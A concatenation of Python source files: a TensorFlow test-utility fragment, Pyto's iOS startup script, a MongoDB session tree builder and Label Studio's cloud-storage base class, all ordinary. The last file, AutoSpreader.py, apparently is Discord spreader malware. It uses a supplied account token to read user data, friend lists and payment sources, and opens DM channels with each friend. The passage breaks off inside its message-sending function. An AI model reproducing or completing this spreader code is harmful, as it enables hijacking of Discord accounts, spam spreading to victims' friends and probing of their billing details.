target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
    # `_GetNdArray` returns a single ndarray; guard the list case anyway so
    # `arrays` is always defined.
    arrays = [target] if not isinstance(target, list) else target
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
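  # A usage sketch for assertRaisesWithPredicateMatch / assertRaisesOpError
  # (`my_op`, `bad_input`, and the messages are hypothetical): either a
  # regular expression or a predicate callable may be supplied:
  #
  #   with self.assertRaisesOpError("negative input not supported"):
  #     self.evaluate(my_op([-1.0]))
  #
  #   with self.assertRaisesWithPredicateMatch(
  #       errors.InvalidArgumentError, lambda e: "shape" in str(e)):
  #     self.evaluate(my_op(bad_input))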
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
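  # Illustrative note (not part of the original file): repeated calls with the
  # same (graph, config, force_gpu) triple reuse one ErrorLoggingSession:
  #
  #   s1 = self._get_cached_session()
  #   s2 = self._get_cached_session()
  #   assert s1 is s2   # cached; mismatched args would raise ValueError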
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
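# Illustrative usage sketch (node and graph names are assumptions, not part of
# the original file):
#
#   graph_def = some_graph.as_graph_def()
#   node = get_node_def_from_graph("my_const", graph_def)
#   if node is not None:
#     print(node.op)  # e.g. "Const"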
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
|
Startup.py
|
import sys
import os
sys.path.insert(-1, os.path.expanduser("~/Documents"))
sys.path.insert(-1, os.path.expanduser("~/Documents/site-packages"))
import io
import console
import code
import pyto
from importlib.machinery import SourceFileLoader
import importlib
import threading
from time import sleep
from outputredirector import Reader
from extensionsimporter import *
import warnings
import logging
from _ios_getpass import getpass as _ios_getpass
import getpass
import webbrowser
import sharing
import _signal
import traceback
from pip import BUNDLED_MODULES
# MARK: - Warnings
logging.basicConfig(level=logging.INFO)
def __send_warnings_to_log__(message, category, filename, lineno, file=None, line=None):
    try:
        warnings
    except NameError:
        import warnings
    try:
        pyto
    except NameError:
        import pyto
_message = warnings.formatwarning(message, category, filename, lineno, line)
try:
pyto.PyOutputHelper.printWarning(_message, script=threading.current_thread().script_path)
except AttributeError:
pyto.PyOutputHelper.printWarning(_message, script=None)
return
warnings.showwarning = __send_warnings_to_log__
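# Illustrative sketch (not part of the original file): after the assignment
# above, a plain stdlib warning is rendered through Pyto's output helper:
#
#   import warnings
#   warnings.warn("this shows up in the Pyto console")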
# MARK: - Allow / Disallow subprocesses
os.allows_subprocesses = (sys.platform != "ios")
# MARK: - Input
def askForInput(prompt=None):
try:
threading
except NameError:
import threading
try:
console
except NameError:
import console
    if threading.current_thread() in console.ignoredThreads:
return ""
else:
return console.input(prompt)
__builtins__.input = askForInput
getpass.getpass = _ios_getpass
# MARK: - Output
def read(text):
try:
console
except NameError:
import console
console.print(text, end="")
standardOutput = Reader(read)
standardOutput._buffer = io.BufferedWriter(standardOutput)
standardError = Reader(read)
standardError._buffer = io.BufferedWriter(standardError)
sys.stdout = standardOutput
sys.stderr = standardError
# MARK: - Web browser
class MobileSafari(webbrowser.BaseBrowser):
'''
Mobile Safari web browser.
'''
def open(self, url, new=0, autoraise=True):
sharing.open_url(url)
return True
webbrowser.register("mobile-safari", None, MobileSafari("MobileSafari.app"))
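# Illustrative usage sketch (not part of the original file): once registered,
# the browser is reachable through the standard webbrowser API:
#
#   import webbrowser
#   webbrowser.get("mobile-safari").open("https://example.com")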
# MARK: - Modules
for importer in (NumpyImporter, MatplotlibImporter, PandasImporter, PillowImporter, BiopythonImporter, LXMLImporter, ScipyImporter, SkLearnImporter, SkImageImporter, PywtImporter, NaclImporter):
sys.meta_path.insert(0, importer())
# MARK: - Pre-import modules
def importModules():
try:
import PIL.ImageShow
def show_image(image, title=None, **options):
import os
import tempfile
import sharing
imgPath = tempfile.gettempdir()+"/image.png"
i = 1
while os.path.isfile(imgPath):
i += 1
imgPath = os.path.join(tempfile.gettempdir(), 'image '+str(i)+'.png')
image.save(imgPath, "PNG")
if title == "OpenCV":
sharing.quick_look(imgPath, remove_previous=True)
else:
sharing.quick_look(imgPath)
PIL.ImageShow.show = show_image
except ImportError:
pass
threading.Thread(target=importModules).start()
# MARK: - Create a Selector without class.
__builtins__.Selector = pyto.PySelector.makeSelector
__builtins__.Target = pyto.SelectorTarget.shared
# MARK: - Deprecations
__builtins__.deprecated = []
# MARK: - Pip bundled modules
if pyto.PipViewController is not None:
pyto.PipViewController.bundled = BUNDLED_MODULES
# MARK: - OS
def fork():
    # fork() is not available on iOS; stub it out as a no-op.
    pass
def waitpid(pid, options):
    # No child processes can exist, so report "no child" immediately.
    return (-1, 0)
os.fork = fork
os.waitpid = waitpid
# MARK: - Handle signal called outside main thread
old_signal = _signal.signal
def signal(signal, handler):
try:
threading
except NameError:
import threading
if threading.main_thread() == threading.current_thread():
return old_signal(signal, handler)
else:
return None
_signal.signal = signal
# MARK: - Run script
pyto.Python.shared.isSetup = True
while True:
try:
SourceFileLoader("main", "%@").load_module()
except Exception as e:
traceback.print_exc()
|
trees.py
|
from Queue import Queue
from threading import Thread, Lock
from time import sleep
from ml.feature_extraction import BTree
from utils import parse_timespan
class BuildWorker(Thread):
def __init__(self, par):
super(BuildWorker,self).__init__()
self.daemon = True
self.par = par
self.keep_working = True
self.is_working = True
def interrupt(self):
self.keep_working = False
def run(self):
while self.par.work_available() and self.keep_working:
job = self.par.__get_work__()
userTree = BTree()
# itemCount = 0
uuid = job["_id"]
# day_count = job["day_count"]
days = job["daily_sessions"]
day_index = 0
for day in days:
day_index += 1
#print "adding sessions for {0} for day {1}/{2}".format(uuid, day_index, day_count)
sessions = day
day_items = []
for session in sessions:
host = session["Domain"]
duration = parse_timespan(session["Duration"]).total_seconds()
day_items.append({'time': duration, 'label': host})
userTree.build(day_items)
#print "added daily sessions for {0}".format(uuid)
self.par.push_result(userTree, uuid)
print ("Worker stopping because no work is available")
self.is_working = False
class MassTreeBuilder:
def __init__(self, batch_size, store, filter, user_id_key):
import settings
self.userSessionTypeId = "598f20d002d2516dd0dbcee2"
appId = "123123123"
# sessionsPath = "testData/Netinfo/payingBrowsingSessionsDaySorted.csv"
        db = settings.get_db()
self.documents_col = db.IntegratedDocument
self.work_queue = Queue()
self.lock = Lock()
self.batch_size = batch_size
self.res_queue = Queue()
# self.remaining = self.documents_col.find({
# "TypeId": self.userSessionTypeId,
# "Document.is_paying": 0,
# # "Document.Created" : { "$lt" : week4Start }
# }).distinct("Document.UserId")
self.query_filter = filter
self.user_id_key = user_id_key
self.remaining = self.documents_col.find(self.query_filter).distinct(user_id_key)
self.workers = []
self.collecting_data = False
self.io_lock = Lock()
self.store = store
        for _ in range(2):
            self.__fetch__()
def __fetch__(self):
self.collecting_data = True
with self.lock:
ids = self.remaining[:self.batch_size]
del self.remaining[:self.batch_size]
#job items are users, and all their daily sessions
match_filter = self.query_filter
match_filter[self.user_id_key] = {"$in": ids}
pipeline = [
{"$match": match_filter },
{"$group": {"_id": "$" + self.user_id_key,
"day_count": {"$sum": 1},
"daily_sessions": {"$push": "$Document.Sessions"}
}
}
]
user_groups = self.documents_col.aggregate(pipeline)
with self.lock:
for d in user_groups:
self.work_queue.put_nowait(d)
self.collecting_data = False
def interrupt(self):
for w in self.workers:
w.interrupt()
def __get_work__(self):
with self.lock:
rem = len(self.remaining)
if self.work_queue.qsize() <= self.batch_size and rem > 0:
if not self.collecting_data:
t = Thread(target=self.__fetch__)
t.daemon = True
t.start()
job = self.work_queue.get()
self.work_queue.task_done()
return job
def is_working(self):
return any(w.is_working for w in self.workers)
def work_available(self):
with self.lock:
rem = len(self.remaining)
queue_rem = len(self.work_queue.queue)
return rem != 0 or queue_rem != 0
def push_result(self, res, id=None):
if self.store:
from utils import abs_path, save
import os
path = abs_path(os.path.join("netinfo", id + ".pickle"))
with self.io_lock:
save(res, path)
else:
self.res_queue.put({'uuid': id, 'result': res})
def build(self, max_threads=8):
for i in xrange(max_threads):
w = BuildWorker(self)
w.start()
self.workers.append(w)
def make(self, max_threads=8):
self.build(max_threads=max_threads)
try:
while self.work_available() and self.is_working():
sleep(1)
except KeyboardInterrupt:
self.interrupt()
results = self.get_result()
return results
def get_result(self):
if not self.work_available():
return list(self.res_queue.queue)
return []
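# Illustrative usage sketch (the filter values below are taken from the
# commented-out query in __init__; everything else is an assumption, not part
# of the original file):
#
#   builder = MassTreeBuilder(
#       batch_size=100, store=False,
#       filter={"TypeId": "598f20d002d2516dd0dbcee2", "Document.is_paying": 0},
#       user_id_key="Document.UserId")
#   results = builder.make(max_threads=4)
#   # with store=False each entry looks like {'uuid': ..., 'result': <BTree>}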
|
base.py
|
import os
import re
import logging
import threading
import ujson as json
from abc import ABC, abstractmethod
from datetime import datetime, timedelta
from shutil import copy2
from flask_wtf import FlaskForm
from wtforms import StringField, BooleanField
from wtforms.validators import InputRequired, Optional, ValidationError
from collections import OrderedDict
from ordered_set import OrderedSet
from label_studio.utils.io import json_load
from label_studio.utils.validation import TaskValidator, ValidationError as TaskValidationError
logger = logging.getLogger(__name__)
_storage = {}
def register_storage(storage_type, class_def):
if storage_type in _storage:
raise IndexError('Storage {} already exists'.format(storage_type))
_storage[storage_type] = class_def
def get_storage_form(storage_type):
return _storage[storage_type].form
def create_storage(storage_type, name, path, project_path=None, project=None, **kwargs):
if storage_type not in _storage:
raise NotImplementedError('Can\'t create storage "{}"'.format(storage_type))
return _storage[storage_type](name=name, path=path, project_path=project_path, project=project, **kwargs)
def get_available_storage_names():
out = OrderedDict()
for key in sorted(_storage, key=lambda x: _storage[x].description):
out[key] = _storage[key].description
return out
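# Illustrative usage sketch (the "s3" type name and MyS3Storage class are
# assumptions, not part of the original file): backends register themselves at
# import time and are then created through the factory:
#
#   register_storage("s3", MyS3Storage)
#   storage = create_storage("s3", name="tasks", path="my-bucket",
#                            project_path="/tmp/project")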
class BaseForm(FlaskForm):
bound_params = {}
class BaseStorageForm(BaseForm):
path = StringField('Path', [InputRequired()], description='Storage path (e.g. bucket name)')
# Bind here form fields to storage fields {"form field": "storage_field"}
bound_params = dict(path='path')
class BaseStorage(ABC):
form = BaseStorageForm
description = 'Base Storage'
def __init__(self, name, path, project_path=None, project=None, **kwargs):
self.name = name
self.path = path
self.project_path = project_path
self.project = project
self.form_class = BaseStorageForm
self.is_syncing = False
def __str__(self):
return self.__class__.__name__
def get_params(self):
return {
form_param: getattr(self, storage_param)
for form_param, storage_param in self.form.bound_params.items()
}
def set_project(self, project):
self.project = project
@property
def default_data_key(self):
if self.project is not None:
if self.project.data_types.keys():
return list(self.project.data_types.keys())[0]
return ''
@property
@abstractmethod
def readable_path(self):
pass
@classmethod
def from_dict(cls, d):
return cls(**d)
@abstractmethod
def get(self, id):
pass
@abstractmethod
def __contains__(self, id):
pass
@abstractmethod
def set(self, id, value):
pass
@abstractmethod
def set_many(self, ids, values):
pass
@abstractmethod
def ids(self):
pass
@abstractmethod
def max_id(self):
pass
@abstractmethod
def items(self):
pass
@abstractmethod
def remove(self, id):
pass
@abstractmethod
def remove_all(self):
pass
@abstractmethod
def empty(self):
pass
class IsValidRegex(object):
def __call__(self, form, field):
try:
re.compile(field.data)
except re.error:
raise ValidationError(field.data + ' is not a valid regular expression')
class CloudStorageForm(BaseStorageForm):
prefix = StringField('Prefix', [Optional()], description='File prefix')
regex = StringField('Regex', [IsValidRegex()], description='File filter by regex, example: .* (If not specified, all files will be skipped)') # noqa
data_key = StringField('Data key', [Optional()], description='Task tag key from your label config')
use_blob_urls = BooleanField('Use BLOBs URLs', default=True,
description='Generate task data with URLs pointed to your bucket objects '
'(for resources like jpg, mp3 & other BLOBs). This could be used for '
'label configs with <b>one data key only</b>. '
'If not selected, bucket objects will be interpreted as '
"tasks in Label Studio JSON format and it's suitable "
"for <b>multiple data keys</b>")
bound_params = dict(
prefix='prefix',
regex='regex',
use_blob_urls='use_blob_urls',
data_key='data_key',
**BaseStorageForm.bound_params
)
class CloudStorage(BaseStorage):
thread_lock = threading.Lock()
form = CloudStorageForm
description = 'Base Cloud Storage'
def __init__(
self, prefix=None, regex=None, create_local_copy=True, use_blob_urls=True, data_key=None,
sync_in_thread=True, presign=True, **kwargs
):
super(CloudStorage, self).__init__(**kwargs)
self.prefix = prefix or ''
self.regex_str = regex
self.regex = re.compile(self.regex_str) if self.regex_str else None
self._ids_file = None
if self.project_path is not None:
self.objects_dir = os.path.join(self.project_path, 'completions')
os.makedirs(self.objects_dir, exist_ok=True)
self._ids_file = os.path.join(self.project_path, self.name + '.json')
self.create_local_copy = create_local_copy
self.use_blob_urls = use_blob_urls
self.data_key = data_key
self.sync_in_thread = sync_in_thread
self.presign = presign
self.client = self._get_client()
self.validate_connection()
self.last_sync_time = None
self.is_syncing = False
self.sync_period_in_sec = 30
self._ids_keys_map = {}
self._selected_ids = []
self._keys_ids_map = {}
self._load_ids()
self.sync()
def get_params(self):
"""Get params to fill the form"""
params = super(CloudStorage, self).get_params()
params.update({
'prefix': self.prefix,
'regex': self.regex_str,
'create_local_copy': self.create_local_copy
})
return params
@abstractmethod
def validate_connection(self):
pass
@abstractmethod
def _get_client(self):
pass
@property
@abstractmethod
def url_prefix(self):
pass
@property
def key_prefix(self):
return self.url_prefix + self.path + '/'
@property
@abstractmethod
def readable_path(self):
pass
@property
def _save_to_file_enabled(self):
return self.project_path is not None and self._ids_file is not None
def _load_ids(self):
if self._save_to_file_enabled and os.path.exists(self._ids_file):
self._ids_keys_map = json_load(self._ids_file, int_keys=True)
self._keys_ids_map = {item['key']: id for id, item in self._ids_keys_map.items()}
def _save_ids(self):
if self._save_to_file_enabled:
with open(self._ids_file, mode='w') as fout:
json.dump(self._ids_keys_map, fout)
@abstractmethod
def _get_value(self, key):
pass
def _get_value_url(self, key):
data_key = self.data_key if self.data_key else self.default_data_key
return {data_key: self.url_prefix + self.path + '/' + key}
def _validate_task(self, key, parsed_data):
""" Validate parsed data with labeling config and task structure
"""
is_list = isinstance(parsed_data, list)
# we support only one task per JSON file
if not (is_list and len(parsed_data) == 1 or isinstance(parsed_data, dict)):
            raise TaskValidationError('Error at ' + key + ':\n'
                                      'Cloud storages support only one task per JSON file. '
                                      'Task must be {} or [{}] with length = 1')
# classic validation for one task
validator = TaskValidator(self.project)
try:
new_tasks = validator.to_internal_value(parsed_data if is_list else [parsed_data])
except TaskValidationError as e:
# pretty format of errors
messages = e.msg_to_list()
out = [(key + ' :: ' + msg) for msg in messages]
out = "\n".join(out)
raise TaskValidationError(out)
return new_tasks[0]
def get_data(self, key):
if self.use_blob_urls:
return self._get_value_url(key)
else:
# read task json from bucket and validate it
try:
parsed_data = self._get_value(key)
except Exception as e:
raise Exception(key + ' :: ' + str(e))
return self._validate_task(key, parsed_data)
def _get_key_by_id(self, id):
item = self._ids_keys_map.get(id)
if not item:
# selected id not found in fetched keys
return
item_key = item['key']
if not item_key.startswith(self.key_prefix + self.prefix):
# found key not from current storage
return
return item_key
def get(self, id):
item_key = self._get_key_by_id(id)
if not item_key:
return
try:
key = item_key.split(self.key_prefix, 1)[-1]
data = self.get_data(key)
except Exception as exc:
# return {'error': True, 'message': str(exc)}
logger.error(str(exc), exc_info=True)
raise exc
if 'data' in data:
data['id'] = id
return data
else:
return {'data': data, 'id': id}
def _id_to_key(self, id):
if not isinstance(id, str):
id = str(id)
if self.prefix:
if id.startswith(self.prefix):
return id
if self.prefix.endswith('/'):
return self.prefix + id
return self.prefix + '/' + id
return id
@abstractmethod
def _set_value(self, key, value):
pass
def _pre_set(self, id, value):
if self.prefix:
key = self.prefix + '/' + str(id)
else:
key = str(id)
full_key = self.key_prefix + key
self._set_value(key, value)
self._ids_keys_map[id] = {'key': full_key, 'exists': True}
self._keys_ids_map[full_key] = id
self._selected_ids.append(id)
return full_key
def set(self, id, value):
full_key = self._pre_set(id, value)
self._save_ids()
logger.debug('Create ' + full_key + ' in ' + self.readable_path)
if self.create_local_copy:
self._create_local(id, value)
def set_many(self, keys, values):
raise NotImplementedError
def _create_local(self, id, value):
local_file = os.path.join(self.objects_dir, str(id) + '.json')
logger.debug('Creating local copy in file ' + local_file)
with open(local_file, mode='w', encoding='utf8') as fout:
json.dump(value, fout)
def max_id(self):
return max(self._ids_keys_map.keys(), default=-1)
def ids(self):
self.sync()
return self._selected_ids
def _ready_to_sync(self):
if not self.regex_str:
return False
if self.last_sync_time is None:
return True
return (datetime.now() - self.last_sync_time) > timedelta(seconds=self.sync_period_in_sec)
def sync(self):
self.validate_connection()
if self.sync_in_thread:
if self._ready_to_sync():
thread = threading.Thread(target=self._sync)
thread.daemon = True
thread.start()
else:
logger.debug('Not ready to sync.')
else:
self._sync()
def _validate_object(self, key):
pass
def iter_full_keys(self):
for key in self._get_objects():
if self.regex is not None and not self.regex.match(key):
logger.debug(key + ' is skipped by regex filter')
continue
            try:
                self._validate_object(key)
            except Exception:
                # Skip objects that fail backend-specific validation.
                continue
yield self.key_prefix + key
def _extract_task_id(self, full_key):
"""Infer task ID from specified key (e.g. by splitting tasks.json/123)"""
pass
def _get_new_id(self, key, new_id):
idx = self._extract_task_id(key)
if idx is not None:
return idx, new_id
idx = new_id
new_id += 1
return idx, new_id
def _sync(self):
with self.thread_lock:
self.last_sync_time = datetime.now()
self.is_syncing = True
new_id = self.max_id() + 1
new_ids_keys_map = {}
new_keys_ids_map = {}
full = OrderedSet(self.iter_full_keys())
intersect = full & OrderedSet(self._keys_ids_map)
exclusion = full - intersect
# new tasks
for key in exclusion:
id, new_id = self._get_new_id(key, new_id)
new_ids_keys_map[id] = {'key': key, 'exists': True}
new_keys_ids_map[key] = id
# old existed tasks
for key in intersect:
id = self._keys_ids_map[key]
new_ids_keys_map[id] = {'key': key, 'exists': True}
new_keys_ids_map[key] = id
with self.thread_lock:
self._selected_ids = list(new_ids_keys_map.keys())
self._ids_keys_map.update(new_ids_keys_map)
self._keys_ids_map.update(new_keys_ids_map)
self._save_ids()
self.is_syncing = False
@abstractmethod
def _get_objects(self):
pass
def items(self):
for id in self.ids():
obj = self.get(id)
if obj:
yield id, obj
def empty(self):
self.sync()
return len(self._ids_keys_map) == 0
def __contains__(self, id):
item_key = self._get_key_by_id(id)
return item_key is not None
def remove(self, key):
raise NotImplementedError
def remove_all(self):
raise NotImplementedError
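# Minimal subclass sketch (illustrative only; every name below is an
# assumption, not part of the original file). A concrete backend fills in the
# abstract client/object hooks that CloudStorage leaves open:
#
#   class DictStorage(CloudStorage):
#       description = 'In-memory storage (for tests)'
#
#       def _get_client(self):
#           return {}
#
#       def validate_connection(self):
#           pass
#
#       @property
#       def url_prefix(self):
#           return 'mem://'
#
#       @property
#       def readable_path(self):
#           return self.url_prefix + self.path
#
#       def _get_value(self, key):
#           return self.client[key]
#
#       def _set_value(self, key, value):
#           self.client[key] = value
#
#       def _get_objects(self):
#           return iter(self.client)
#
#   storage = DictStorage(name='test', path='bucket', use_blob_urls=True)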
|
AutoSpreader.py
|
from distutils.log import debug
from urllib.request import Request, urlopen
from json import loads, dumps
from time import sleep
from threading import Thread
from flask import Flask
from waitress import serve
import requests
from discord_webhook import DiscordWebhook, DiscordEmbed
app = Flask(__name__)
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discord.com/api/v9/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def getfriends(token):
try:
return loads(urlopen(Request("https://discord.com/api/v9/users/@me/relationships", headers=getheaders(token))).read().decode())
except Exception as e:
print(e)
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discord.com/api/v9/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except Exception as e:
print(e)
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discord.com/api/v9/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
